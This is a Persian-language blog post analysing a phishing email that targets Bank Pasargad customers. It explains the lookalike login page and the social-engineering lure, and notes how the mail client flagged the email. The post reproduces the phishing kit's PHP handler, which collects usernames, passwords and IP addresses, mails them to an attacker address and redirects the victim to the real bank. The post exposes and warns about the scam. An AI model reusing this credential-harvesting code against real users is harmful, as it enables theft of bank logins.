یه ایمیل برام اومد که با یه روش قدیمی و شناخته شده سعی در هک کردن اکانت حساب بانکی پاسارگادم داره؛ فیشینگ (Phishing).
همنوطور که تو تصویر بالا قابل مشاهده هست لینک داخل ایمیل در ظاهر دقیقا لینک دسترسی به اینترنت بانک پاسارگاد هست ولی در باطن لینک شده به یه سایت دیگه که دقیقا عین سایت اصلی ساخته شده فقط هرچی توی فیلدهای این صفحه بنویسیم (شامل نام کاربری و کلمه عبور) رو برای هکر میفرسته و بعد هم صفحه اصلی بانک رو نشون میده تا یه وقت به چیزی شک نکنیم و فکر کنیم که احتمالا خودمون فیلدی رو اشتباه وارد کردیم. با یه مهندسی اجتماعی ساده (اینکه کسی ۶ میلیون تومن پول ریخته به حسابمون) هم سعی کرده تحریکمون کنه که حتما لاگین کنیم.
جالب اینجاست که این هک برای انگلیسی زبانها ساخته شده و درگاه پرداخت اصلی هم به زبان انگلیسی هست.
خوشبختانه هم خود Thunderbird تشخیص داد که این ایمیل جعلی هست و هم وقتی روی لینک کلیک میکنیم یه پیغام میده که ظاهر این لینک با آدرسی که بهش اشاره کرده نمیخونه ولی اگر هکر یه کم حرفهایتر بود میتونست کاری کنه که ایمیل اسپم نشه و این هشدار هم داده نشه. به هر حال من شک ندارم حداقل ۸۰ درصد مردم متوجه هیچ کدوم از این مسائل نمیشن و نام کاربری و کلمه عبورشون رو برای هکر میفرستن! متاسفانه، به همین راحتی.
به روز رسانی
خوشبختانه مثل اینکه این هکر ما یه مقداری ناشی هست. اگر به مسیر روت سایت فیشینگ برید میبیند که Directory Listing سرور رو نبسته و از اون بدتر نسخه zip شده سایت رو هم گذاشته روی سرور این یعنی سورس این صفحه در دسترس هست. کد PHP این صفحه فیشینگ به شکل زیره:
<?php $ip = getenv("REMOTE_ADDR"); $message .= "--------------INFORMATION-------------------n"; $message .= "User: ".$_POST['username']."n"; $message .= "Pass: ".$_POST['password']."n"; $message .= "IP: ".$ip."n"; $message .= "---------------Created By Kizito +6289524438862--------------------n"; $send = "[email protected]"; $subject = "Pasargad"; $headers = "From: iben.bpi.ir"; mail($send,$subject,$message,$headers); header("Location: https://iben.bpi.ir/"); ?>
همونطور که مشخصه ایمیلی که اطلاعات قربانیها براش ارسال میشه [email protected] هست و البته برنامهنویس یه تلفن هم گذاشته که مال اندونزی هست! یه سناریو میتونه این باشه که یه آدم غیر فنی سفارش این هک رو به یه فریلنسر داده و ازش تحویل گرفته ولی موقعه بارگذاری چون مسائل امنیتی رو نمیدونسته اینطوری کدها رو در معرض دید عموم قرارداده. این برنامهنویس کلاه سیاه هم تلفنش رو گذاشته بوده واسه تبلیغ!